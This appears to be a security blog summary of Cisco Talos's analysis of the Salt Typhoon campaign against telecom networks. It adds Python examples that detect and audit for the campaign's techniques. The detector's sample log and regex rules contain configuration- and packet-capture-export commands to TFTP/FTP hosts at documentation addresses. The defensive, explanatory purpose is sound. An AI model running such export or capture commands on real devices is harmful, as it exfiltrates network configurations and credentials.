Cisco detailed Salt Typhoon Attack on Telecom Networks

The Salt Typhoon cyber espionage campaign has been meticulously analyzed by Cisco Talos, revealing a highly sophisticated operation targeting global telecommunications networks. This campaign, attributed to a suspected Beijing-linked threat actor, demonstrates advanced capabilities, including prolonged persistence in compromised systems and extensive exfiltration of sensitive data.

Overview of the Campaign

Emergence and Tactics

  • Targets: The campaign primarily focuses on telecommunications providers. However, it has also extended to universities and other critical infrastructure, indicating a broad scope of targets.
  • Phishing Techniques: Attackers employ spear-phishing emails containing malicious attachments or links. These emails are crafted to deceive recipients into executing the malicious payload, often appearing as legitimate communications from trusted sources.

Infection Chain

Initial Infection

  • Compromised Credentials: The primary method of gaining initial access involves using compromised login credentials. Attackers acquire these credentials through various means, including phishing and recovering passwords that were stored with weak encryption.
  • Exploited Vulnerabilities: In certain cases, attackers have leveraged known vulnerabilities, such as CVE-2018-0171, to gain access to Cisco devices. Exploiting these vulnerabilities allows them to bypass security measures and establish a foothold in the target network.

Persistence Mechanism

  • Living-off-the-Land (LOTL) Techniques: Salt Typhoon extensively uses LOTL techniques, leveraging inherent functionality and administrative tools within the compromised environments to avoid detection. This includes using tools like tcpdump and Cisco-specific utilities like tpacap to capture sensitive traffic and discover security keys.

Key Components

Custom Malware

  • JumbledPath: Cisco Talos discovered a new custom-built malware named “JumbledPath,” which allows attackers to create a chain of remote connections between targeted Cisco devices and Salt Typhoon-controlled jump hosts. This malware facilitates encrypted packet capture and data exfiltration, significantly enhancing the attackers’ ability to steal sensitive information without being detected.

Data Exfiltration

Exfiltration Channels

  • TFTP and FTP: Attackers exfiltrate network configurations over TFTP (Trivial File Transfer Protocol) or FTP (File Transfer Protocol). These files often contain authentication material and a detailed blueprint of the compromised network, providing valuable information for further exploitation.
  • Encrypted Packet Capture: The JumbledPath utility enables attackers to create encrypted packet capture chains through the Guest Shell environments of compromised Cisco Nexus devices. This method ensures that the data being exfiltrated remains hidden from traditional network monitoring tools.

Indicators of Compromise (IoCs)

  • Suspicious Network Traffic: Monitor for unusual network traffic involving TFTP, FTP, and encrypted packet captures. Such traffic can indicate the presence of data exfiltration activities.
  • Executable Presence: Be vigilant for the presence of custom malware like JumbledPath and tools like tcpdump and tpacap on systems. These files are indicative of a compromised environment and should be investigated promptly.
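The two indicators above (config exports over TFTP/FTP and capture tooling such as tcpdump or tpacap on the devices) can be turned into simple detection rules over command-accounting logs. The following is an added example, not code from Cisco Talos or from the report; the log line format and the sample lines are constructed for this example, and the IP addresses are documentation ranges.

```python
import re
from dataclasses import dataclass

# Constructed sample of command-accounting log lines (the format is assumed for this
# example and is not a real Cisco syslog format); 192.0.2.0/24 and 198.51.100.0/24 are
# documentation ranges.
SAMPLE_LOG = """\
2025-02-20T10:15:32Z host=core-rtr1 user=netops cmd="show ip interface brief"
2025-02-20T10:16:04Z host=core-rtr1 user=netops cmd="copy running-config tftp://192.0.2.10/core-rtr1.cfg"
2025-02-20T10:17:41Z host=edge-nx1 user=svc-backup cmd="guestshell run sudo tcpdump -i eth1 -w /bootflash/cap.pcap port 49"
2025-02-20T10:18:02Z host=edge-nx1 user=svc-backup cmd="copy bootflash:cap.pcap ftp://198.51.100.7/cap.pcap"
2025-02-20T10:19:10Z host=core-rtr2 user=netops cmd="tpacap -i gi0/0/1"
2025-02-20T10:20:00Z host=core-rtr2 user=netops cmd="show version"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>[^"]*)"$')

# (rule name, category, regex over the command). "export" rules cover config/file copies
# over TFTP or FTP; "capture" rules cover the packet-capture tooling named in the IoCs.
RULES = [
    ("config-export-over-tftp-ftp", "export", re.compile(r'^copy\s+\S*(running|startup)-config\s+(tftp|ftp):', re.I)),
    ("file-export-over-tftp-ftp", "export", re.compile(r'^copy\s+\S+\s+(tftp|ftp)://', re.I)),
    ("guestshell-tcpdump", "capture", re.compile(r'\bguestshell\b.*\btcpdump\b', re.I)),
    ("tpacap-capture", "capture", re.compile(r'\btpacap\b', re.I)),
]

@dataclass
class Alert:
    rule: str
    category: str
    host: str
    user: str
    cmd: str

def scan_log(text):
    """Return one Alert per log line whose command matches a rule (first match wins)."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for name, category, rx in RULES:
            if rx.search(m.group("cmd")):
                alerts.append(Alert(name, category, m.group("host"), m.group("user"), m.group("cmd")))
                break
    return alerts

def correlate(alerts):
    """Hosts that show both a capture and an export: the capture-then-exfiltrate pattern."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a.host, set()).add(a.category)
    return {h for h, cats in by_host.items() if {"capture", "export"} <= cats}
```

On the sample, scan_log yields four alerts and correlate singles out edge-nx1, the only host that both captured packets and pushed a file out over FTP.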

Mitigation Measures

Immediate Actions

  • Apply Security Updates: Ensure that all Cisco devices are updated with the latest security patches to mitigate known vulnerabilities. Regularly check for and apply updates to maintain a secure network environment.
  • Restrict Management Interface Access: Limit access to the management interface of Cisco devices to trusted IP addresses. Implementing access controls can significantly reduce the attack surface and prevent unauthorized access.
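A quick way to check the two points above, together with the weakly encrypted stored passwords mentioned under Initial Infection, is to audit the running configuration: every vty line should carry an access-class limiting it to trusted addresses, and no account should use a reversible type 7 password. This is an added example, not Cisco's or Talos's code; the configuration excerpt is constructed, the hash is a placeholder, and 192.0.2.0/24 is a documentation range standing in for the management subnet.

```python
import re

# Constructed IOS-style configuration excerpt for this example (not from the report).
SAMPLE_CONFIG = """\
hostname core-rtr1
username backup password 7 0822455D0A16
username netops secret 9 $9$constructed-placeholder-hash
ip access-list standard MGMT-ONLY
 permit 192.0.2.0 0.0.0.255
line vty 0 4
 transport input ssh
line vty 5 15
 access-class MGMT-ONLY in
 transport input ssh
"""

def parse_vty_blocks(config):
    """Return {'vty 0 4': [child lines], ...} for every 'line vty' stanza."""
    blocks, current = {}, None
    for raw in config.splitlines():
        if raw.startswith("line vty"):
            current = raw[len("line "):]
            blocks[current] = []
        elif raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())
        else:
            current = None  # any other top-level line ends the stanza
    return blocks

def audit_config(config):
    findings = []
    # Type 7 passwords are reversibly encoded, so an exfiltrated config exposes them directly.
    for m in re.finditer(r'^username (\S+) password 7 ', config, re.M):
        findings.append(f"type7-password:{m.group(1)}")
    for rng, children in parse_vty_blocks(config).items():
        # Management access must be restricted to trusted source addresses.
        if not any(c.startswith("access-class ") and c.endswith(" in") for c in children):
            findings.append(f"vty-without-access-class:{rng}")
        # Only SSH should be accepted on the management lines.
        if "transport input ssh" not in children:
            findings.append(f"vty-transport-not-ssh-only:{rng}")
    return findings
```

On the sample the audit reports the type 7 password on the backup account and the unrestricted vty 0 4 lines; vty 5 15 passes both checks.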

Long-Term Strategies

  • Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses in the IT infrastructure. This proactive approach helps in early detection and remediation of vulnerabilities.
  • Enhanced Access Controls: Implement robust access control mechanisms to ensure that only authorized users can perform privileged actions. Enforce multi-factor authentication (MFA) for all administrative accounts to add an extra layer of security.
  • Monitoring and Logging: Deploy comprehensive monitoring and logging solutions to detect and respond to unauthorized access attempts. Regularly review logs for signs of suspicious activity to promptly identify and mitigate potential threats.
  • User Education and Awareness: Educate administrators and users about the risks associated with command injection vulnerabilities and the importance of following security best practices. Encourage them to report any suspicious activities promptly.

Known Victims of Salt Typhoon

U.S. Telecommunications Companies

  1. AT&T: One of the largest telecommunications companies in the U.S., AT&T confirmed that its network was compromised by Salt Typhoon attackers.
  2. Verizon: Another major U.S. telecom provider, Verizon, reported breaches that targeted high-profile government and political figures.
  3. Lumen Technologies: Lumen, formerly known as CenturyLink, also confirmed that its network was infiltrated by the attackers.
  4. Charter Communications: Recently added to the list of victims, Charter Communications faced breaches that compromised sensitive data.
  5. Consolidated Communications: Another recent addition, Consolidated Communications, experienced similar breaches.
  6. Windstream: Windstream was also targeted, adding to the growing list of compromised telecom networks.

Other Affected Entities

  • T-Mobile: Although initially reported as a victim, T-Mobile later clarified that it was not among the nine companies referenced by the government. However, it acknowledged attempts consistent with Salt Typhoon’s tactics.
  • Cisco and Fortinet Devices: The attackers exploited unpatched vulnerabilities in Cisco and Fortinet devices to gain access to the networks.

Impact and Risks

  • Sensitive Data Access: The breaches allowed attackers to access sensitive data, including text messages, voicemails, and phone calls.
  • Network Management Compromise: In some cases, attackers took over high-level network management accounts, potentially allowing them to copy traffic back to China and delete their digital tracks.

Government Response

  • CISA Advisory: The Cybersecurity and Infrastructure Security Agency (CISA) has advised senior government officials to switch to end-to-end encrypted messaging apps, such as Signal, to prevent interception risks.
  • Legislative Actions: U.S. Senator Ron Wyden announced a bill aimed at securing American telecom infrastructure, and FCC Chair Jessica Rosenworcel proposed new regulations to address these vulnerabilities.

Final Thoughts

The Salt Typhoon campaign highlights the critical importance of robust security measures and proactive incident response strategies. By understanding the nature of the campaign and implementing the recommended mitigation measures, organizations can better protect their systems from such sophisticated threats.
